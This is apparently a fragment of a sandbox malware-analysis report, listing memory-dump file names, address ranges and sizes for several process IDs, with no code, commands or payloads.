memory/184-155-0x0000000006870000-0x0000000006871000-memory.dmpFilesize
4KB
-
memory/184-141-0x0000000000000000-mapping.dmp
-
memory/1348-117-0x0000000000000000-mapping.dmp
-
memory/1824-129-0x0000000005332000-0x0000000005333000-memory.dmpFilesize
4KB
-
memory/1824-125-0x0000000008270000-0x0000000008271000-memory.dmpFilesize
4KB
-
memory/1824-139-0x0000000005333000-0x0000000005334000-memory.dmpFilesize
4KB
-
memory/1824-132-0x0000000008AA0000-0x0000000008AA1000-memory.dmpFilesize
4KB
-
memory/1824-131-0x00000000088A0000-0x00000000088A1000-memory.dmpFilesize
4KB
-
memory/1824-130-0x0000000008650000-0x0000000008651000-memory.dmpFilesize
4KB
-
memory/1824-137-0x000000000A1F0000-0x000000000A1F1000-memory.dmpFilesize
4KB
-
memory/1824-128-0x0000000005330000-0x0000000005331000-memory.dmpFilesize
4KB
-
memory/1824-138-0x0000000009790000-0x0000000009791000-memory.dmpFilesize
4KB
-
memory/1824-119-0x0000000000000000-mapping.dmp
-
memory/1824-127-0x00000000082E0000-0x00000000082E1000-memory.dmpFilesize
4KB
-
memory/1824-122-0x0000000005290000-0x0000000005291000-memory.dmpFilesize
4KB
-
memory/1824-123-0x00000000079F0000-0x00000000079F1000-memory.dmpFilesize
4KB
-
memory/1824-124-0x00000000078C0000-0x00000000078C1000-memory.dmpFilesize
4KB
-
memory/1824-126-0x0000000008090000-0x0000000008091000-memory.dmpFilesize
4KB
-
memory/1920-229-0x0000000000000000-mapping.dmp
-
memory/1932-223-0x0000000000000000-mapping.dmp
-
memory/2008-221-0x0000000000000000-mapping.dmp
-
memory/2024-225-0x0000000000000000-mapping.dmp
-
memory/2336-208-0x0000000001253000-0x0000000001254000-memory.dmpFilesize
4KB
-
memory/2336-206-0x0000000001252000-0x0000000001253000-memory.dmpFilesize
4KB
-
memory/2336-205-0x0000000001250000-0x0000000001251000-memory.dmpFilesize
4KB
-
memory/2336-202-0x0000000000000000-mapping.dmp
-
memory/2356-216-0x0000000000DA3000-0x0000000000DA4000-memory.dmpFilesize
4KB
-
memory/2356-209-0x0000000000DA0000-0x0000000000DA1000-memory.dmpFilesize
4KB
-
memory/2356-217-0x0000000000DA4000-0x0000000000DA6000-memory.dmpFilesize
8KB
-
memory/2356-207-0x0000000000000000-mapping.dmp
-
memory/2356-210-0x0000000000DA2000-0x0000000000DA3000-memory.dmpFilesize
4KB
-
memory/2372-215-0x0000000000000000-mapping.dmp
-
memory/2448-200-0x0000000004AE2000-0x0000000004AE3000-memory.dmpFilesize
4KB
-
memory/2448-204-0x0000000004AE3000-0x0000000004AE4000-memory.dmpFilesize
4KB
-
memory/2448-198-0x0000000004AE0000-0x0000000004AE1000-memory.dmpFilesize
4KB
-
memory/2448-187-0x0000000000000000-mapping.dmp
-
memory/3168-197-0x00000000011F3000-0x00000000011F4000-memory.dmpFilesize
4KB
-
memory/3168-175-0x00000000011F2000-0x00000000011F3000-memory.dmpFilesize
4KB
-
memory/3168-173-0x00000000011F0000-0x00000000011F1000-memory.dmpFilesize
4KB
-
memory/3168-164-0x0000000000000000-mapping.dmp
-
memory/3228-218-0x0000000000000000-mapping.dmp
-
memory/3616-231-0x0000000000000000-mapping.dmp
-
memory/3996-114-0x0000000000000000-mapping.dmp